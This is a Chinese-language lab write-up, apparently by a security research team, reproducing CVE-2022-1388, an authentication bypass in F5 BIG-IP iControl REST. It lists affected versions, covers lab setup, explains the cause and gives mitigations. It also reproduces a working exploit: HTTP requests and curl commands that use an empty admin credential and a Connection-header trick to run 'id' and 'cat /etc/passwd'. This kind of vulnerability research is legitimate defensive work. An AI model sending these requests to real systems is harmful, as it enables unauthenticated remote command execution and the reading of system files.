​CVE-2022-1388 BIG-IP iControl REST 漏洞复现

CVE-2022-1388：BIG-IP iControl REST 漏洞

影 响

Impact

This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.

根据官方描述得知，该漏洞允许未授权的攻击者通过接口对BIG-IP系统访问，并能执行任意系统命令、创建、删除文件以及关闭服务。

产品	分支	受影响版本	Fixes introduced in3	漏洞威胁等级	CVSSv3 评分
BIG-IP (all modules)	17.x	None	17.0.0	严重	9.8
	16.x	16.1.0 - 16.1.2	16.1.2.2
	15.x	15.1.0 - 15.1.5	15.1.5.1
	14.x	14.1.0 - 14.1.4	14.1.4.6
	13.x	13.1.0 - 13.1.4	13.1.5
	12.x	12.1.0 - 12.1.6	官方无补丁
	11.x	11.6.1-11.6.5	官方无补丁

复 现

从官网https://downloads.f5.com/esd/productlines.jsp下载4个版本虚拟镜像，本地复现：

选择镜像需要在受影响版本内的虚拟机ova包，

下载好的镜像，直接双击打卡导入，或者在虚拟机中选择导入均可：

导入完成后打开该虚拟机，需要获取该虚拟机的ip，终端输入root/default登录后输入ifconfig mgmt即可查看ip

然后在浏览器输入https://<ip>打开看到登录界面抓包即可

参考https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html的exp如下：

# F5 BIG-IP RCE exploitation (CVE-2022-1388)

POST (1): 

POST /mgmt/tm/util/bash HTTP/1.1
Host: <redacted>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c 'id' " }

curl commandliner: 

$ curl -i -s -k -X $'POST'
-H $'Host: <redacted>:8443' 
-H $'Authorization: Basic YWRtaW46' 
-H $'Connection: keep-alive, X-F5-Auth-Token' 
-H $'X-F5-Auth-Token: 0' 
-H $'Content-Length: 52' 
--data-binary $'{"command": "run" , "utilCmdArgs": " -c 'id' " }x0dx0a'
$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080


POST (2):

POST /mgmt/tm/util/bash HTTP/1.1
Host: <redateced>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }

curl commandliner:

$ curl -i -s -k -X $'POST'
-H $'Host: <redacted>:8443' 
-H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' 
-H $'X-F5-Auth-Token: 0'
--data-binary $'{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }x0dx0ax0dx0a'
$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080

问题可能与使用空凭据admin:绕过了前端和后端身份验证有关，以及HTTP的 hop_by_hop请求头问题:

https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open

https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers

HTTP的 hop_by_hop请求头问题，大概意思就是讲：

请求还可以定义一组自定义的标头，通过将它们添加到标头中来逐跳处理Connection，如下所示：

Connection: close, X-Foo, X-Bar

在此示例中，我们要求代理将X-Foo和X-Bar作为逐跳处理，这意味着我们希望代理在传递请求之前将它们从请求中删除。

复现过程中发现只有14.x-16.x版本的请求头需要为Host:localhost才可以。

修 复 方 案

建议升级只最新版本或可参考官方修复建议：https://support.f5.com/csp/article/K23605346 的Recommended Actions

在受影响的版本内可执行以下步骤以缓解攻击：

通过自身 IP 地址阻止 iControl REST 访问

通过管理界面阻止 iControl REST 访问

修改 BIG-IP httpd 配置

参 考 链 接

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388

https://support.f5.com/csp/article/K23605346

https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html

https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open

https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers

原文始发于微信公众号（山石网科安全技术研究院）：​CVE-2022-1388 BIG-IP iControl REST 漏洞复现